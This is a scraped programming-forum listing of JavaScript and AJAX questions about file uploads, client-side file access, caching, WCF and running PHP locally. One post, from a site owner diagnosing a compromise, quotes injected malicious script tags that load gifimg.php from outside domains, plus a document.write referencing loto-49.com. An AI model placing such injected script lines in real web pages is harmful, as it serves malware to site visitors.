AJAX :: In Gmail And Other Services - Uploads All The JS Files Into Client's Machine?

Nov 8, 2010

in Gmail (I've noticed it in other services too..)after you log in, progress bar appears. What does it do? Uploads all the JS(containing ajax) files into client's machine? or what?

View 1 Replies


ADVERTISEMENT

Call Exe On Client Machine?

Jul 10, 2010

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head2" runat="server">
<title>Run Executable HTA</title>

[code].....

View 1 Replies View Related

Find The Information About Client Machine?

Oct 4, 2007

I need to find the information about Client machine by using Javascript : Information like : How much Avaliable sapce on clinet's machine ? Need to find RAM size . Operation System. Can we have any built in Active X control to get all these values ?

View 7 Replies View Related

Open A Filedialog On Client Side Machine

May 26, 2009

i want to open filedialog on client machine in javascript (in jsp page) ,Following is the code i have written but it is not working

var Frame = new java.awt.Frame();
var fd = new java.awt.FileDialog(Frame, "Browse File",java.awt.FileDialog.SAVE);
fd.toFront();
fd.show();
var getDirectory = new java.awt.FileDialog(Frame);
[Code]...

View 3 Replies View Related

JQuery :: Multiple Files Upload - Appear With A Max Of 9 Uploads At A Time

Mar 25, 2010

Does anybody knows a good jQuery multiple file uploader? The idea is when somebody click on the Upload link some kind of popup box needs to appear. Something like the media uploader in WordPress. The background of the website becomes grey, and only a upload box appear. It would be cool that only if you have selected one file, the next input for a new upload appear with a max of 9 uploads at a time ...

View 5 Replies View Related

Generate List Of Clients Machine Files?

Dec 5, 2002

I want to make an extensive browser/fileupload script inspired on windows Explorer... A server side listing of the files and directories with the home directory specified in the script and a listing of the clients files. The server side part can be found on http://vegeta.evilkalah.be ... The idea now is to make it possible to upload or download (maybe drag and drop) files from on side to the other. I don't know how I best make the client side. So on this part any help is welcome...

View 6 Replies View Related

Java Applet Development - Code To Check Whether JRE Is Installed On Client Machine?

Aug 19, 2009

Java Applet Development - JavaScript code to check whether JRE is installed on client machine.

View 4 Replies View Related

Uploading Files (PHP) To The Server From Local Machine Via Dreamweaver?

Feb 6, 2010

On uploading files (PHP and javascript) to the server from local machine via dreamweaver, Google Chrome reported the presence of malicious codes (like loto-49) inside the server page. Later when I checked, I found that a HTML Code:document.write('....loto-49.com....'); was automatically added at the end of each javascript *.js files. On their removal, the warnings were gone.Recently, they again appeared. Between the closure of the head tag (</head>) and the start of the body tag(<body>) the following code is added automatically:

HTML Code:
<script src=http://hilalgroup.com/images/gifimg.php ></script> <script src=http://pianotainment.com/images/gifimg.php ></script>

[code]....

View 7 Replies View Related

JQuery :: Plugin - Ajax Image Uploads

Jun 25, 2009

I'm doing some ajax image uploads using the plugin at [url] I have multiple images on the page which I will be replacing with the uploaded image. My problem is this, trying to refer to the clicked image within the onComplete function.

I tried creating a variable that refered to 'this' which I beleive to be the image element but when I make the change to the element it is not refected, making me think that the variable is a copy and not a reference ?

View 1 Replies View Related

JQuery :: Detect Ajax With File Uploads?

Jul 23, 2009

I'm developing a framework that allow all navigation in normal mode or in ajax load.

I have a form to upload images and I can upload files correctly, but if I use the ajax form, the save page don't receive the HTTP_X_REQUESTED_WITH in $_SERVER PHP array (only occours when a file is uploaded).

How can I detect an ajax load with a file upload form?

View 3 Replies View Related

AJAX :: Not Working When Run From Desktop Machine?

Sep 5, 2010

i followed my first AJAX tutorial on the web: [URL]

the AJAX is working fine on the site itself, but when i download the source codes provided with the tutorial, it won't run from my machine. i checked this with several tutorials and all same. i.e. no results when run from the desktop machine.

i tried with IE7 and ff 4.0

View 2 Replies View Related

Upload List Of Files From Client Directory

Sep 9, 2010

Anyone have a link or search term for a way to allow the user to upload a list of file names to a web form? I do not need the actual files, just the file names -- name only or full path, doesn't matter. I can live with either just pointing to a directory and grabbing every file name in it, or requiring the user to select all the desired files from within a directory list. (My guess is that the JavaScript sandbox for a web form won't allow this, but I figured I'd check with you experts before looking into other possibilities, e.g. Java applet, etc.) I'm already using the JQuery library for some other stuff, in case there's something I should be looking for there or one of its plug-ins.

View 8 Replies View Related

JQuery :: Ajax Request Works With .xml Files But Not .php Files?

Aug 27, 2010

In my quest to implement ajax for the first time i've hit a brick wall. i've been searching for hours for a solution but with no success. Here is the problem.

[Code]...

why is it not working? my PHP code is outputting the contents of the xml document.

View 1 Replies View Related

Ajax & Other Client Technology Experiences?

Mar 24, 2006

We have a Java and JSP environment and are looking at options for
the client, such as using Ajax. It would be especially interesting to
get comparisons (e.g., pros and cons) with applets or other approaches.

View 1 Replies View Related

Ajax :: Cache Response Into Client Browser?

Dec 29, 2010

Hint me about an easy and clear way to cache ajax response into client browser WITHOUT using the JQuery? I am unable to find that on google.

I have a page that is loaded using AJAX and it takes long time to load every time (approximately 28 seconds), so I need to cache it to reduce the time. I tried the stored procedure for database, but it did not give me good result, so I want to try the caching.

View 6 Replies View Related

How To Upload A File Using Web Services

Apr 28, 2007

Can anyone show me some example code of uploading a file using a web service?

View 15 Replies View Related

Ajax :: Client Object Method Invoking With Parameter?

Dec 14, 2010

Inside client control I generate a button, with script to run.I want to call object's Print() method when this button is clicked, the result value must be passed to Print() as well.How can I do that?This is my object:

Type.registerNamespace("CustomControls");
CustomControls.FirstObj = function(element) {
CustomControls.FirstObj.initializeBase(this, [element]);[code]....

View 1 Replies View Related

Jquery :: Ajax Returning Values From Server To Client?

May 27, 2011

I'm doing some jquery and ajax work with C# asp.net MVC on the server.

I have this JS function:

function DeleteListing(receiptItemId){
$.ajax({
url: "DeleteListing",
type: "POST",

[Code].....

What I'm wondering is there ways to return values from DeleteListing on the server to the success function?

View 4 Replies View Related

Ajax :: Use PHP With Files On Localhost?

Sep 7, 2010

For Ubuntu 10.04, Apache 2, PHP5 and MySQL 5, Firefox 3.6. (I already had Apache, Mysql and Firefox installed, so only added PHP5 via the synaptic manager a couple of days ago).

I have only just started with Ajax and PHP and obtained some demo files from w3schools.com (by googling on 'Ajax PHP database') that I named w3.html and getuser.php. These show how to find person details in a MySQL data base and send them back to be displayed by a browser. They work when Firefox accesses the demo at w3schools.com.

I put these files into directory /var/www on my PC (the upload file directory) and tried via Firefox, but got this error showing in the Firefox Error console:

I also obtained a similar demo from [url]. It failed in the same way, but worked when accessing www.tizag.com directly.

I googled on permutations of 'Ajax', 'XMLHTTPRequest' and 'no element found' and noticed that many have had this problem. A few said that this problem occurs when the Ajax-side expects XML but gets HTML from the server, but did not give any solutions.

PHP works when I put 'localhost/getuser.php?q=2' into the Firefox addressbar. It generates the result table which looks well-formed to me.

I then modified the eventhandler onreadystatechange to

Code:

And found:

i) The status code returned is always 0 (not 200 or any other 3-digit http return code).

ii) The text returned is the content of the getuser.php file, not the content generated by executing the PHP code.

iii) The 'no element found' error is still shown

My intention was to learn and experiment with Ajax and PHP on my local PC, but it did not work. Can it be done, or do I have to get a website and use FTP to upload?

w3.html

Code:

w3.html:

Code:

Use mysql command source w3demo.sql from the MySQL command line.

View 5 Replies View Related

How To Call SQL Server Reporting Services

Dec 14, 2009

I am not quite sure where to place this question since it involves C#, javascript and even a call to SSRS. What I want to do is call a Sql Server Reporting Services Report, using javascript like so:

ClientScript.RegisterStartupScript(GetType(), "FrameUpdate", "<script language="JavaScript">" + "
" + "cursor_wait();" + "
" + "window.location.href ="[URL]" + ViewState["ANumber"].ToString().Trim() + "&BNumber=" + ViewState["BNumber"].ToString() + "&Sort_Param=" + ViewState["sortField"].ToString() + "&Sort_Direction=" + ViewState["sortDirection"].ToString() +"&rc:Toolbar=false&rs:Command=render&rs:Format=PDF&rs:Zoom=Fit Page'; " + "
" + "cursor_clear();" + "
" + "<" + "/script>");

The code works and I can pull the correct report. The issue is I wanted some visual que for the user that the report was being generated. that is why i used the javascript functions : cursor_wait(), and cursor_clear().
The problem is I want to display a wait cursor until the window with the report returns and displays the report then reset to the default cursor at that time. But the above code resets the cursor right away without waiting for the report to return. I tried adding attributes to the page form and other methods to access onBlur and such but haven't been able to get there yet.

View 5 Replies View Related

Send Sms Through Free Online Services From PC?

Jan 5, 2011

My project simulation takes lot of time so I cant monitor that continuously,. I want to send a SMS whenever some simulation is done/ progress / throws an error to my mobile through SMS when I'm away from the PC.. I dont know how to start with this.. how to do this I want to use free online SMS service to do this..

View 4 Replies View Related

JQuery :: Ajax Or Not - Load All The Client's Data Of The Selected Week?

Oct 4, 2010

I am developping an interface that allows to manage bookings for a selected week. You can add, delete, view a booking. When you open a client's booking, I could fetch the id from some div, call an ajax request, and load the booking's data in some dialog (client's data, booking info (date, hour, description, ..)). I don't wish to forward the manager to another page (another request).

But another option, would be to load all the client's data of the selected week (may be up to 100) into a hidden div, and when the manager wants to view a booking, I may just fetch the data from that hidden div. It's much faster, there's no ajax. However, the problems is that there will be a lot of HTML, and I guess the page will be slower to parse; I need a (very) fast page rendering (it's already pretty loaded as it's an application). A solution would be to load asynchronously that data in the hidden div, so the page may render fast, but I don't know how to achieve this. No server request (ajax) is needed as I have the data, but don't want to put it directly into the page, it will slow it down, but to insert the data after the page rendering. Like an ajax without server request ...

View 2 Replies View Related

JQuery :: Show Server Side Process On The Client Using Ajax?

Feb 22, 2010

My login to the site is being processed using ajax, which does a redirect to the members page upon succesfull loggin in.The login feature however can in fact take a while because we need to initialise quite some data when a user logs in (his details, but also his privileges are loaded, his personal menu based on these privileges are being loaded, we are loading shopping cart info, we are initialising personalisation settings, and a whole lot more.It sounds like a big thing, but it isn't, and once logged in, the application is going great. the only thing is that the login proceure can take 3 - 4 seconds, and I would like to be able to show the client the progress of the serverside script:

"Searching your account..."
"Validating your privileges"
"Initialising your personal menu"
blablabla...

To do this, I might just call an ajax call that starts the login procedure, and then issue another ajax call every 1 second or so to update the status based on some session variables I set in the login procedure and that I can serve to the client when th next ajax calls come in, but I would love for this to work a little nicer as in just needing to initialise ONE ajax call which can send back statusupdates from the server...

View 1 Replies View Related

Ajax :: Recognizing Div Elements In External Files?

Oct 25, 2010

I am implementing Ajax for a new website and I've run into a hurdle.

It seems like Javascript does not 'see' any div elements that are loaded from external file with Ajax.

Is this a common issue, and is there a solution? Or am I overlooking something obvious?

What I'm doing is loading a simple external page via Ajax. The pages loads just fine, and it contains div's with unique id's. If I execute a Javascript function, it seems to not recognize these newly-rendered div's from the Ajax external file. Is this the case? Can Javascript be re-invoked on command, so it can see the new div's?

View 1 Replies View Related

Ajax :: Not Working Inside Include Files

Mar 12, 2011

I have the following code inside an include file which is included in my index.php page. All of my include files are placed in a folder called includes alongside my index file and the file ajax_getusers.php. When I have tested out this code all in one page it works fine but if I put the first section of code below in an include and include it in my index page it does not work at all. Is therer any reason for this?

Code:

<script type="text/javascript">
function showUser(str)
{
if (str=="")

[Code]....

View 1 Replies View Related

JQuery :: Calling WCF Services - Json-based Webservices

Feb 20, 2008

I'm doing some research about MS WCF 3.5 web services and how it can be used for json-based web services. All of the examples I'm finding use the asp.net ScriptManager tag on a server side page so that a js proxy for the web service methods gets created on page load. I don't want to use asp.net for page generation.

I'm looking for an example of how to use jquery in a non-asp.net rendered page to make calls to the WCF 3.5 web services. IE, I want my client side code to be server agnostic: it could be plain HTML, or an AIR app, etc....not an asp.net app, not a page rendered by asp.net. I think I'm basically looking for a way around having to rely on the asp.net ScriptManager to generate the js proxy: I just want to call the services via jquery ajax calls, without having to rely on what the proxy would generate for me.

BTW, this is research particularly for using WCF 3.5, so no need to recommend other backend WS technologies (unless maybe they are alternate WS engines that have a minimal C# learning curve and are not heavily bound internally to XML documents, like Dream is).

View 7 Replies View Related







Copyrights 2005-15 www.BigResource.com, All rights reserved